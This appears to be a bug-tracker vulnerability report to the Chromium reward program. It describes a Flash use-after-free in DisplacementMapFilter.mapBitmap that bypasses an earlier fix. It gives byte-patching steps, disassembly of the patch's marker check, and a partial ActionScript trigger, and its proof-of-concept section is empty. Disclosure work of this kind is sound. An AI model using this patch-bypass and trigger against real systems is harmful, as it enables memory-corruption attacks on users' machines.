[Deadline tracking for]
Credit is to bilou, working with the Chromium Vulnerability Reward Program
There is a use after free in Flash caused by an improper handling of BitmapData objects in the DisplacementMapFilter.mapBitmap property.
This is almost a repost ofIssue 457680due to a patch failure.
Chrome Version: N/A now, Flash StandAlone Debug
Operating System: [Win7 x64 SP1]
The AS2 mapBitmap_v2_as2.fla can be compiled with Flash CS5. Some bytes must be changed manually to trigger the issue (see below).
Just put mapBitmap_v2_as2.swf in a browsable directory and run the swf with Chrome. It might crash while dereferencing 0x41424344 (hopefully, not tested yet because not available).
After compiling mapBitmap_v2_as2.swf, I had to change the bytes at offset 0x92B in the (MyBitmapData constructor):
52 17 96 02 00 04 03 26 to 17 17 17 17 17 17 17 17 (actionPOP)
The description is exactly the same as inIssue 457680so I won't repost it. Here are just my comments on the patch.
They basically added a marker at offset +0xDC in the flash standalone debugger (the standalone player is not available at the time of writing):
.text:005AD629 loc_5AD629:
.text:005AD629 lea ecx, [esi+0DCh]
.text:005AD62F pushedi
.text:005AD630 mov [ebp+1C4h+var_198], ecx
.text:005AD633 callxsetUseMarker
.text:0059F762 cmp byte ptr [ecx], 0 ; is the marker present?
.text:0059F765 jzshort loc_59F77B
.text:0059F767 cmp [esp+arg_0], 0; is 0 provided?
.text:0059F76C jzshort locret_59F77E
.text:0059F76E mov ecx, dword_EE4788 ; kill the program
.text:0059F774 callsub_9798C0
.text:0059F779 jmp short locret_59F77E
.text:0059F77B loc_59F77B:
.text:0059F77B mov byte ptr [ecx], 1 ; else set the marker
.text:0059F77E locret_59F77E:
.text:0059F77E retn4
That marker is then removed when we exit the BitmapData dispatcher:
.text:005AEF29 mov eax, [ebp+1C4h+var_198] ; jumptable 005AD654 default case
.text:005AEF2C mov byte ptr [eax], 0
So, to trigger again the issue, we just have to put an extra call to getPixel32 for example:
var o = new Object()
o.valueOf = function () {
bd.getPixel32(1,4)// remove the marker :)
for (var i = 0; i<0x10;i++) {
var tf:TextFormat = new TextFormat()
tf.tabStops = b
a[i] = tf
return 4
And we're done :)
Proof of Concept: